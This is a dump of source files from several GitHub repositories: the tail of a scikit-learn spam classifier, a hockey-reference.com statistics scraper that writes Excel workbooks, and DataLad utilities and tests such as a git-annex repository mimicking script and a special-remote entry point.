make_Dictionary(TEST_DIR)\n\nprint(\"reading and processing emails from file.\")\nfeatures_matrix, labels = extract_feature(TRAIN_DIR)\ntest_feature_matrix, test_labels = extract_feature(TEST_DIR)\n\nmodel = svm.SVC()\n\nprint(\"Training model.\")\n# train model\nfeatures_matrix = features_matrix[:len(features_matrix)/10]\nlabels = labels[:len(labels)/10]\nmodel.fit(features_matrix, labels)\n\npredicted_labels = model.predict(test_feature_matrix)\n\nprint(\"FINISHED classifying. 
accuracy score : \")\nprint(accuracy_score(test_labels, predicted_labels))\n\n" }, { "alpha_fraction": 0.7810945510864258, "alphanum_fraction": 0.7810945510864258, "avg_line_length": 49.25, "blob_id": "24ae3df4131aec99bf51701b84042212832f44c5", "content_id": "aa89d44102070316aeb6747673ca7601199fa800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 201, "license_type": "no_license", "max_line_length": 122, "num_lines": 4, "path": "/README.md", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "# Sklearn-ML\nIn this repository we will test the famous Machine learning library scikit-learn, based on cheat sheet provided by sklearn\n\n![alt text](https://scikit-learn.org/stable/_static/ml_map.png)\n" } ]
3
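Aside: the LinearSVC.py entry in the record above calls np.zeroes(...) and iterates "for word in word", both of which fail at runtime (NumPy's function is numpy.zeros, and the inner loop should walk the words list). The snapshot is kept verbatim; a corrected sketch of just the matrix-initialization and word-counting step, assuming the same 3000-word dictionary layout, is shown below with made-up sample data.

# Illustrative corrected sketch (the snapshot above is left unchanged).
import numpy as np

def empty_features(n_docs: int, n_words: int = 3000):
    # np.zeros (not "zeroes") allocates the document-by-term count matrix and the label vector
    return np.zeros((n_docs, n_words)), np.zeros(n_docs)

features, labels = empty_features(5)
words = ["free", "money", "free"]
dictionary = [("free", 2), ("money", 1)]   # stand-in for the 3000 most common words
for word in words:                         # iterate the list, not the loop variable
    for word_id, (entry, _count) in enumerate(dictionary):
        if entry == word:
            features[0, word_id] = words.count(word)
print(features[0, :2])   # [2. 1.]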
DrewMcMillen/50_In_07
https://github.com/DrewMcMillen/50_In_07
1cc61b5962390378fa57cd9af0b420d2bd3eabb4
a8ac1bffd80e59fb13ecf51210d23912439ccc10
4b106e44c964c52a903bbb1f1edc9069b70a1a15
refs/heads/master
2020-06-29T03:38:30.650169
2019-10-12T18:42:40
2019-10-12T18:42:40
200,429,601
0
0
null
2019-08-03T23:22:32
2019-08-03T23:23:55
2019-10-12T18:42:41
null
[ { "alpha_fraction": 0.588921308517456, "alphanum_fraction": 0.6044703722000122, "avg_line_length": 35.75, "blob_id": "ca009d1f1587ef7d46b985cb0085014120e79465", "content_id": "6396d0a250372b06f78a51230799b9f20a5f7557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/config_tanya/config.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "class ScraperConfig:\n\n def __init__(self):\n self.script_name = ''\n self.baseurl = ''\n self.template = ''\n self.playertemplate = ''\n self.dest = ''\n self.playermetrics = ['standard', 'possession', 'miscellaneous', 'playoffs', 'other',\n 'similarity', 'penalty', 'goalie_advanced', 'hat_tricks', 'ot_goals']\n\n def setconfig(self, script_name, baseurl, date, extrametrics=''):\n self.script_name = script_name\n self.baseurl = baseurl\n self.template = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/templates/template_1.xlsx'\n self.playertemplate = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/templates/template_2.xlsx'\n self.dest = '/Users/tanyatang/Documents/Code/Python/50_In_07/data_tanya/data_raw/' + date + '/'\n for metric in extrametrics:\n self.playermetrics.append(metric)\n\n\nclass Config:\n\n def __init__(self):\n i = 0\n\n def setconfig(self):\n i = 0\n" }, { "alpha_fraction": 0.5740326642990112, "alphanum_fraction": 0.5778160095214844, "avg_line_length": 38.557823181152344, "blob_id": "68712eac92851240422759bfde6ad770f7b800c1", "content_id": "e3a0ad9514f6e81d36ba8f7d12884fd81cf4ba29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5815, "license_type": "no_license", "max_line_length": 103, "num_lines": 147, "path": "/config_tanya/scraper.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup, Comment\nimport config_tanya.scraper_header as header\nimport urllib.request\nimport shutil\nimport openpyxl as op\n\n\ndef scrape1(config, url, short_name):\n\n # Find overall info for team\n teampage = urllib.request.urlopen(url)\n teamsoup = BeautifulSoup(teampage, 'html.parser')\n summarytable = teamsoup.find('table', {'class': 'sortable stats_table'}, id=short_name)\n\n # Create arrays to hold info, will be in descending order from most current season to oldest season\n years_active_urls = []\n team_data = []\n\n # Go through each row of summary table\n for row in summarytable.findAll('tr'):\n\n # Get data\n cells = row.findAll('td')\n columns = row.findAll('th')\n if not len(cells) == 0 and not len(columns) == 0:\n for item in columns:\n years_active_urls.append(config.baseurl + item.find('a', href=True)['href'])\n team_data.append(header.get_row_data(cells, columns))\n\n # Write team data to file\n dest = config.dest + short_name + '.xlsx'\n shutil.copyfile(config.template, dest)\n workbook = op.load_workbook(dest)\n sheet = workbook['overall_info']\n for i in range(len(team_data)):\n for j in range(len(team_data[i])):\n sheet.cell(row=i + 1, column=j + 1).value = team_data[i][j]\n workbook.save(dest)\n\n # Find team members for most current season\n seasonurl = years_active_urls[0]\n seasonpage = urllib.request.urlopen(seasonurl)\n seasonsoup = BeautifulSoup(seasonpage, 'html.parser')\n rostertable = seasonsoup.find('table', {'class': 'sortable stats_table'}, id='roster')\n\n # Create arrays to hold summarized info\n player_urls = []\n 
player_sumdata = []\n\n # Go through each row of roster table\n for row in rostertable.findAll('tr'):\n\n # Get data\n cells = row.findAll('td')\n columns = row.findAll('th')\n if not len(cells) == 0 and not len(columns) == 0:\n player_urls.append(config.baseurl + cells[0].find('a', href=True)['href'])\n player_sumdata.append(header.get_row_data(cells, columns))\n\n # Write roster data to file\n sheet = workbook['current_roster']\n for i in range(len(player_sumdata)):\n for j in range(len(player_sumdata[i])):\n sheet.cell(row=i + 1, column=j + 1).value = player_sumdata[i][j]\n workbook.save(dest)\n workbook.close()\n\n # List all relevant metrics for a player\n player_metrics_titles = config.playermetrics\n player_metrics = []\n\n # Iterate through each player\n for i in range(len(player_urls)):\n\n currentplayer = []\n\n try:\n\n # Find detailed information for each player\n playerpage = urllib.request.urlopen(player_urls[i])\n playersoup = BeautifulSoup(playerpage, 'html.parser')\n\n # Get all placeholder texts\n all_comments = playersoup.find_all(string=lambda text: isinstance(text, Comment))\n table_comments = ['']\n table_titles = ['standard']\n for c in all_comments:\n if 'skaters_advanced' in c:\n table_comments.append(c)\n table_titles.append('possession')\n elif 'stats_misc_plus_nhl' in c:\n table_comments.append(c)\n table_titles.append('miscellaneous')\n elif 'stats_basic_plus_nhl_po' in c:\n table_comments.append(c)\n table_titles.append('playoffs')\n elif 'stats_basic_minus_other' in c:\n table_comments.append(c)\n table_titles.append('other')\n elif 'similarity_scores' in c:\n table_comments.append(c)\n table_titles.append('similarity')\n elif 'penalty_shots' in c:\n table_comments.append(c)\n table_titles.append('penalty')\n elif 'stats_goalie_situational' in c:\n table_comments.append(c)\n table_titles.append('goalie_advanced')\n elif 'hat_tricks' in c:\n table_comments.append(c)\n table_titles.append('hat_tricks')\n elif 'playoff_ot_goals' in c:\n table_comments.append(c)\n table_titles.append('ot_goals')\n\n # Get player metrics\n for title in player_metrics_titles:\n currenttitle = []\n for j in range(len(table_titles)):\n if table_titles[j] == title:\n currenttitle = header.get_table_data(title, playersoup, table_comments[j])\n currentplayer.append(currenttitle)\n player_metrics.append(currentplayer)\n print(player_sumdata[i + 1][1] + ' complete')\n\n except AttributeError:\n\n # If a player has no historical data\n print(player_sumdata[i + 1][1] + \" has no information available\")\n player_metrics.append(currentplayer)\n\n for i in range(len(player_metrics)):\n\n # Write player data to file\n playerdest = dest = config.dest + 'players/' + player_sumdata[i + 1][1] + '.xlsx'\n shutil.copyfile(config.playertemplate, playerdest)\n workbook = op.load_workbook(dest)\n if len(player_metrics[i]) > 0:\n for metric, title in zip(player_metrics[i], player_metrics_titles):\n workbook.create_sheet(title)\n sheet = workbook[title]\n for j in range(len(metric)):\n for k in range(len(metric[0])):\n sheet.cell(row=j + 1, column=k + 1).value = metric[j][k]\n workbook.remove(workbook['temp'])\n workbook.save(playerdest)\n workbook.close()\n" }, { "alpha_fraction": 0.5298013091087341, "alphanum_fraction": 0.5364238619804382, "avg_line_length": 15.777777671813965, "blob_id": "5a63e5d51d2552928a4f7961b6a505dcef8a68b4", "content_id": "310229d4e94c07928c3df1c274de12687f39991f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, 
"license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/config_tanya/header.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "class Team:\n\n def __init__(self, name, filepath):\n self.name = name\n self.filepath = filepath\n\n def getinfo(self):\n i = 0\n\n\nclass Player:\n\n def __init__(self, name, filepath):\n self.name = name\n self.filepath = filepath\n\n def getinfo(self):\n i = 0\n" }, { "alpha_fraction": 0.7137150168418884, "alphanum_fraction": 0.7350199818611145, "avg_line_length": 26.814815521240234, "blob_id": "63c088794c4662313e2718ffb1d4c727efcc8c17", "content_id": "8f5f38b8a605e6ae4c5e9f94ae7178207c164d8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 751, "license_type": "no_license", "max_line_length": 57, "num_lines": 27, "path": "/bin_tanya/run_scraper.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from config_tanya.config import ScraperConfig\nimport config_tanya.scraper_header as header\nfrom config_tanya.scraper import scrape1\nimport os\n\nscript_name = 'scraper'\nbaseurl = 'https://www.hockey-reference.com'\ndate = '082419'\nconfig1 = ScraperConfig()\nconfig1.setconfig(script_name, baseurl, date)\n\n# Get team names\nteams_short = header.import_shortnames(config1)\nteams_long = header.import_longnames(config1)\n\n# Create team urls\nteams_url = []\nfor team in teams_short:\n url = baseurl + '/teams/' + team\n teams_url.append(url)\n\n# Get team info\nos.mkdir(config1.dest)\nos.mkdir(config1.dest + 'players/')\nfor url, name in zip(teams_url, teams_short):\n if config1.script_name == 'hockey_reference_scraper':\n scrape1(config1, url, name)\n" }, { "alpha_fraction": 0.49923762679100037, "alphanum_fraction": 0.5053365230560303, "avg_line_length": 38.57758712768555, "blob_id": "d3376750a5159f714cda61712fc3e9821de79c12", "content_id": "4da63fdf8cf6a40e26f6c5589f907c8146868906", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4591, "license_type": "no_license", "max_line_length": 98, "num_lines": 116, "path": "/config_tanya/scraper_header.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef import_shortnames(config):\n teamnames = []\n url = config.baseurl + '/teams/'\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n franchisetable = soup.find('table', {'class': 'sortable stats_table'}, id='active_franchises')\n for row in franchisetable.findAll('tr'):\n columns = row.findAll('th')\n for item in columns:\n if item.find(text=True) and item['class'][0] == 'left':\n teamnames.append(item.find(href=True)['href'][-4:-1])\n return teamnames\n\n\ndef import_longnames(config):\n teamnames = []\n url = config.baseurl + '/teams/'\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n franchisetable = soup.find('table', {'class': 'sortable stats_table'}, id='active_franchises')\n for row in franchisetable.findAll('tr'):\n columns = row.findAll('th')\n for item in columns:\n if item.find(text=True) and item['class'][0] == 'left':\n teamnames.append(item.find(text=True))\n return teamnames\n\n\ndef get_row_data(cells, columns):\n data = []\n if len(cells) == 0:\n for item in columns:\n data.append(item.find(text=True))\n elif len(columns) == 0:\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if 
item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n elif len(columns) == 1:\n for item in columns:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n else:\n for item in cells:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n for item in columns:\n if item.find(text=True):\n data.append(item.find(text=True))\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append(item.find(text=True))\n else:\n data.append('')\n if item.has_attr('colspan'):\n for k in range(int(item.get('colspan', 1)) - 1):\n data.append('')\n return data\n\n\ndef get_table_data(title, playersoup, comment):\n if title == 'standard':\n currentstandard = []\n standardtable = playersoup.find('table', {'class': 'row_summable sortable stats_table'},\n id='stats_basic_plus_nhl')\n for row in standardtable.findAll('tr'):\n cells = row.findAll('th')\n columns = row.findAll('td')\n currentstandard.append(get_row_data(cells, columns))\n return currentstandard\n else:\n currentdata = []\n soup = BeautifulSoup(comment, 'html.parser')\n for row in soup.findAll('tr'):\n cells = row.findAll('th')\n columns = row.findAll('td')\n currentdata.append(get_row_data(cells, columns))\n return currentdata\n" }, { "alpha_fraction": 0.7878788113594055, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 18.799999237060547, "blob_id": "30ff9b57faec18a1ff756f54a66d3efdaf61fd16", "content_id": "d840c9b1444040dbbff27d1227a41606edb8343c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/bin_tanya/run_basic.py", "repo_name": "DrewMcMillen/50_In_07", "src_encoding": "UTF-8", "text": "from config_tanya.header import Team, Player\nfrom config_tanya.config import Config\n\n# Set up config object\n\n# Construct team objects\n\n# Construct player objects for each team\n\n# Basic ML algorithm\n" } ]
6
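Aside: get_row_data in scraper_header.py above walks each table row, collects th/td cells, and repeats a cell's value once per column it spans (colspan). A reduced, self-contained sketch of that row-extraction idea on an inline HTML snippet; the table content is made up for illustration.

# Illustrative sketch (not part of the repository snapshot above).
from bs4 import BeautifulSoup

html = """
<table>
  <tr><th>Season</th><td>Team</td><td colspan="2">W-L</td></tr>
</table>
"""

soup = BeautifulSoup(html, "html.parser")
for row in soup.find_all("tr"):
    values = []
    for cell in row.find_all(["th", "td"]):
        text = cell.get_text(strip=True) or ""
        # repeat the value for every column a colspan cell occupies, as get_row_data does
        values.extend([text] * int(cell.get("colspan", 1)))
    print(values)   # ['Season', 'Team', 'W-L', 'W-L']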
datalad/datalad
https://github.com/datalad/datalad
2d9c247344d340325ba84e7ab674ac320e57f30c
40332b5ad25bf8744f7399f6c3575f7d28f71384
76f23cc69dc10c44bc7cf00b78e37db04c7a9c45
refs/heads/maint
2023-09-04T11:03:02.264714
2023-08-10T15:56:19
2023-08-10T15:56:19
14,052,034
453
134
NOASSERTION
2013-11-01T19:40:08
2023-09-06T23:55:10
2023-09-14T19:10:17
Python
[ { "alpha_fraction": 0.6177444458007812, "alphanum_fraction": 0.6261311173439026, "avg_line_length": 38.400001525878906, "blob_id": "cd334ea40b1f5c7ff2394182abfdce3f24776b21", "content_id": "5ab15cf395c19bf5643da13ed25e4df60ab13797", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4531, "license_type": "permissive", "max_line_length": 112, "num_lines": 115, "path": "/tools/mimic_repo", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"\n Simple script to simulate an annex repository given a list of files.\n\n Not sure why I wrote it in Python, since in bash it would be more natural and shorter ;)\n\n COPYRIGHT: Yaroslav Halchenko 2014\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2014 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport sys, os\nimport commands\nimport fileinput\n\ni = 0\naddurl = \"http://some.example.com/prefix/\"\n\ndef run_command(cmd):\n global i\n st, output = commands.getstatusoutput(cmd)\n if st != 0:\n raise RuntimeError(\"E: run of {cmd} failed with status={st} output={output}\".format(**locals()))\n return st, output\n\ndef init_git_annex(path):\n if os.path.exists(path):\n raise RuntimeError(\"path {path} exists already\".format(**locals()))\n run_command('mkdir -p {path}; cd {path}; git init; git annex init'.format(**locals()))\n print(\"I: initialized in {}\".format(path))\n\ndef populate_git_annex(list_, path='.'):\n count = 0\n i = 0\n for l in fileinput.FileInput(list_, openhook=fileinput.hook_compressed):\n if not l: break\n i += 1\n items = l.rstrip().split(None, 3)\n s3filename = items[-1]\n if s3filename.endswith('/'):\n continue\n if not s3filename.startswith('s3://'):\n print \"ERROR: %i: %s is not starting with s3://\" % (i, s3filename)\n import pdb; pdb.set_trace()\n # create a dummy file with content being just a filename\n filename_ = s3filename[5:]\n filename = os.path.join(path, filename_)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n with open(filename, 'w') as fout:\n fout.write(filename)\n count += 1\n if not (i % 100):\n sys.stdout.write('.')\n sys.stdout.flush()#print(\"D: ran {cmd}. 
Got output {output}\".format(**locals()))\n # TODO\n if addurl:\n # we need to add a url for each file, thus first we just annex add\n run_command('cd {path}; git annex add {filename_}'.format(**locals()))\n # and then add a bogus url\n url = addurl + filename_\n run_command('cd {path}; git annex addurl --relaxed --file={filename_} {url}'.format(**locals()))\n if not addurl:\n print()\n print(\"I: adding to annex {count} files after processing {i} lines\".format(**locals()))\n run_command('cd {path}; git annex add *'.format(**locals()))\n print(\"I: committing\")\n run_command('cd {path}; git commit -m \"final commit\"'.format(**locals()))\n print \"DONE. Created {} files\".format(count)\n\ndef git_repack(path):\n print(\"Repacking {}\".format(path))\n run_command(\"cd {path}; git repack -a -d -f --window=100\".format(path=path))\n\ndef du(path):\n st, output = commands.getstatusoutput('du -sk {path}'.format(path=path))\n print \"du for {path}: {output}\".format(**locals())\n\nif __name__ == '__main__':\n list_ = sys.argv[1]\n path = sys.argv[2]\n init_git_annex(path)\n populate_git_annex(list_, path)\n du(path)\n git_repack(path)\n du(path)\n\n # let's now clone\n run_command(\"git clone --no-hardlinks {path} {path}.cloned\".format(path=path))\n du(path+\".cloned\")\n" }, { "alpha_fraction": 0.6008458137512207, "alphanum_fraction": 0.6027976870536804, "avg_line_length": 33.155555725097656, "blob_id": "0ce2a58c53751b50c6022a119744beb995c0fdb3", "content_id": "a2931ff04b6473ad41a3bcad5c164dfe053290c2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3074, "license_type": "permissive", "max_line_length": 87, "num_lines": 90, "path": "/datalad/customremotes/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"CLI entrypoint for special remotes\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport argparse\n\nfrom datalad.cli.parser import (\n parser_add_common_opt,\n parser_add_version_opt,\n)\nfrom datalad.cli.utils import setup_exceptionhook\nfrom datalad.ui import ui\n\nimport logging\nlgr = logging.getLogger('datalad.customremotes')\n\n\ndef setup_parser(remote_name, description):\n # setup cmdline args parser\n # main parser\n parser = argparse.ArgumentParser(\n description= \\\n f\"git-annex-remote-{remote_name} is a git-annex custom special \" \\\n f\"remote to {description}\",\n epilog='\"DataLad\\'s git-annex very special remote\"',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=True,\n )\n # common options\n parser_add_common_opt(parser, 'log_level')\n parser_add_version_opt(parser, 'datalad', include_name=True)\n if __debug__:\n parser.add_argument(\n '--dbg', action='store_true', dest='common_debug',\n help=\"Catch exceptions and fall into debugger upon exception\")\n return parser\n\n\ndef _main(args, cls):\n \"\"\"Unprotected portion\"\"\"\n assert(cls is not None)\n from annexremote import Master\n master = Master()\n remote = cls(master)\n master.LinkRemote(remote)\n master.Listen()\n # cleanup\n if hasattr(remote, 'stop'):\n remote.stop()\n\n\ndef main(args=None, 
cls=None, remote_name=None, description=None):\n import sys\n parser = setup_parser(remote_name, description)\n # parse cmd args\n args = parser.parse_args(args)\n\n # stdin/stdout will be used for interactions with annex\n ui.set_backend('annex')\n\n if args.common_debug:\n # So we could see/stop clearly at the point of failure\n setup_exceptionhook()\n _main(args, cls)\n else:\n # Otherwise - guard and only log the summary. Postmortem is not\n # as convenient if being caught in this ultimate except\n try:\n _main(args, cls)\n except Exception as exc:\n lgr.debug('%s (%s) - passing ERROR to git-annex and exiting',\n str(exc), exc.__class__.__name__)\n # `SpecialRemote` classes are supposed to catch everything and\n # turn it into a `RemoteError` resulting in an ERROR message to\n # annex. If we end up here, something went wrong outside of the\n # `master.Listen()` call in `_main`.\n # In any case, exiting the special remote process should be\n # accompanied by such an ERROR message to annex rather than a log\n # message.\n print(\"ERROR %s (%s)\" % (str(exc), exc.__class__.__name__))\n sys.exit(1)\n" }, { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 27.29032325744629, "blob_id": "d27cd3ec68d20bdf60d0914e9bdb4b2f4bd022ba", "content_id": "af3ddcf1bf5653bfe6da779f7715ac7944c7e1e3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 876, "license_type": "permissive", "max_line_length": 83, "num_lines": 31, "path": "/tools/find-hanged-tests", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"\nGiven a log from running tests using pytest -n 2 (or more) see which tests actually\nnever completed\n\"\"\"\n\nimport sys\nimport re\nfrom pathlib import Path\n\nlogfile = Path(sys.argv[-1])\nprint(f\"Working on {logfile}\")\n\nlines = logfile.read_text().splitlines()\nlines = [l.strip() for l in lines]\ntest_line = re.compile('datalad/.*tests/')\n\ntests_started = {l for l in lines if re.match('\\S*datalad/.*tests/test_', l)}\ntests_completed = set()\nfor l in lines:\n res = re.match(r'\\[gw[0-9]+\\].* (\\S*datalad/.*tests/test_.*)', l)\n if res:\n tests_completed.add(res.groups()[0])\ntests_didnot_complete = tests_started - tests_completed\n\n# print(tests_completed)\nprint(f\"{len(tests_started)} started, {len(tests_completed)} completed\")\nif tests_didnot_complete:\n print(\"Never completed:\")\n for t in sorted(tests_didnot_complete):\n print(t)" }, { "alpha_fraction": 0.6278054714202881, "alphanum_fraction": 0.6359102129936218, "avg_line_length": 36.30232620239258, "blob_id": "be89652dedfca6df78d96ca291c2a629002ce0d4", "content_id": "3d1258528fcfcaf45b543aa75fdb1c419d36c312", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1604, "license_type": "permissive", "max_line_length": 88, "num_lines": 43, "path": "/datalad/interface/tests/test_shell_completion.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test command datalad 
shell_completion\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# Not really worth to be there but it is ATM, so let's use that\nfrom datalad.api import shell_completion\nfrom datalad.cmd import WitlessRunner\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n eq_,\n skip_if_on_windows,\n swallow_outputs,\n)\n\n\n@assert_cwd_unchanged\ndef test_shell_completion_python():\n # largely a smoke test for our print(\"hello world\")\n with swallow_outputs() as cmo:\n res = shell_completion()\n out = cmo.out.rstrip()\n # we get it printed and returned for double-pleasure\n eq_(out, res[0]['content'].rstrip())\n\n\n@skip_if_on_windows # TODO: make it more specific since might work if bash is available\ndef test_shell_completion_source():\n # just smoke test that produced shell script sources nicely without error\n WitlessRunner().run(['bash', '-c', 'source <(datalad shell-completion)'])\n # ideally we should feed that shell with TAB to see the result of completion but\n # yoh sees no easy way ATM, and googled up\n # https://stackoverflow.com/questions/9137245/unit-test-for-bash-completion-script\n # requires too much enthusiasm toward this goal.\n" }, { "alpha_fraction": 0.5280898809432983, "alphanum_fraction": 0.5355805158615112, "avg_line_length": 27.864864349365234, "blob_id": "b15f842a40e49fcbe14377318bc24b855c0a2d5f", "content_id": "e3266907941a5bcf2e2c6c247ed773aa26dc84fd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1068, "license_type": "permissive", "max_line_length": 88, "num_lines": 37, "path": "/datalad/support/tests/test_vcr_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for vcr adapter\"\"\"\n\nfrom ...tests.utils_pytest import (\n SkipTest,\n eq_,\n)\nfrom ..vcr_ import use_cassette\n\n\ndef test_use_cassette_if_no_vcr():\n # just test that our do nothing decorator does the right thing if vcr is not present\n skip = False\n try:\n import vcr\n skip = True\n except ImportError:\n pass\n except:\n # if anything else goes wrong with importing vcr, we still should be able to\n # run use_cassette\n pass\n if skip:\n raise SkipTest(\"vcr is present, can't test behavior with vcr presence ATM\")\n\n @use_cassette(\"some_path\")\n def checker(x):\n return x + 1\n\n eq_(checker(1), 2)\n" }, { "alpha_fraction": 0.47252747416496277, "alphanum_fraction": 0.48526474833488464, "avg_line_length": 26.80555534362793, "blob_id": "509398b1d4349e43e71ef9c2468ad206ee317ee8", "content_id": "3dbcb653c78f097e3c461e63ef69a6462076d1eb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4004, "license_type": "permissive", "max_line_length": 87, "num_lines": 144, "path": "/datalad/tests/test_dochelpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along 
